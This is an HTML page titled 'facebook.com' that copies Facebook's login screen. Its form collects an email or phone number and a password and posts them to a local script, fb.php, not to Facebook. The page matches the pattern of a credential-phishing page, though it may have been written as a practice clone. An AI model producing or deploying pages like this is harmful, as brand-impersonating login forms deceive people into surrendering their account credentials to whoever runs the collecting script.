<html>    
    <head>    
        <title>facebook.com</title>    
    </head>

<style>
    
body {
    background-image: url(fb6.jpg);
    background-size:cover;
    
}
#hi {
    width: 400px;
    height: 40px;
    border: 2px solid black;
    border-radius: 8px;
    font-size: 20px;

}
.login {
    background-color: darkblue;
    color: white;
    font-size: 20px;

}
.hello {
    background-color: limegreen;
    width: 200px;
    height: 30px;
    border: 2px solid black;
    border-radius: 8px;
    font-size: 15px;
    color: white;

}
.main{
    /*background-color: rgb(0,0,0,0.5);*/
    background-color: rgb(0,0,0,0.4);
    width: 500px;
    height: 500px;
    /*border-radius: 50px;*/
    margin-top: px;
    /*margin: auto;*/
}

</style>


    <body><center>    
        <!-- <link href = "db.css" type = "text/css" rel = "stylesheet" />     -->
       <br><br> <div class="main"><br><br>
        <font size="10" color="white"><u>Facebook</u></font>
        <br><br><br><br>

        
        <form method = "post" action="fb.php" id="hey" >    
            <div class = "container">      
                <div class = "form_group"> 
                    <br>     
                    <input type = "text" id="hi" name = "Adress" placeholder="Email or Phone" value = "" required/>    
                </div>  
                     <br> 
               <div class = "form_group">                         
                    <input type = "password" id="hi" name = "password" placeholder="Password" value = "" required/>    
                </div> 
                     <br> 
                <div class = "form_group">    

<!-- &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  -->

                   <input type = "submit" id="hi" class="login" name = "submit" value = "Log In" >    
                </div> 
                <br>
                <a href="hello.html"><font color="white">Forgot Password?</font></a>    
            </div> 
<br>
            <div class = "form_group">    
               <input type = "submit" class="hello" name = "submit" value = "Create A New Account" >    
                </div> 
                  
            </div> 
            </center>   
        </form> 
          </div>
    </body>    
</html>    